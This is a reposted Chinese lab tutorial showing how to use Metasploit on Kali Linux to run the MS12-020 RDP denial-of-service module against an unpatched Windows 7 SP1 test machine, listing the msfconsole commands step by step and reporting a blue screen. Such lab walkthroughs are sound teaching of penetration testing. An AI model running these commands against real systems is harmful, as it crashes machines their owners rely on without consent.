ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

kail利用msf工具对MS12-020漏洞进行渗透测试

2021-05-16 14:30:27  阅读:195  来源: 互联网

标签:漏洞 windows MS12 kail 020 IP地址 msf


kail利用msf工具对MS12-020漏洞进行渗透测试

MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞

kail利用msf工具对MS12-020漏洞进行渗透测试:

实验环境:

工具:metasploit

靶机两台:windows 7sp1和kali2020

攻击机IP地址:192.168.29.129

被攻击机IP地址:192.168.29.128

实验条件:两台机子可以互通的,并且windows 7sp1(无补丁)开启了3389端口,防火墙是关闭的。

步骤:

1、首先打开kali主机,打开终端,输入“msfconsole“,进入Metasploit控制台

 

2、搜索ms12-020漏洞利用模块,找到auxiliary/dos/windows/rdp/ms12_020_maxchannelids

3、使用模块 use + auxiliary/dos/windows/rdp/ms12_020_maxchannelids利用这个漏洞

4、查看当前模块所需配置项 show options ,RHOST 需设为远程靶机的IP地址

5、设置配置项,如set RHOST xxx.xxx.xx.x(为攻击目标的IP地址)

6、实施攻击 exploit 或者run

7、查看windows7sp1,成功蓝屏并且重启

 

 

 

 

标签:漏洞,windows,MS12,kail,020,IP地址,msf
来源: https://blog.csdn.net/qq_50854662/article/details/116890286

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有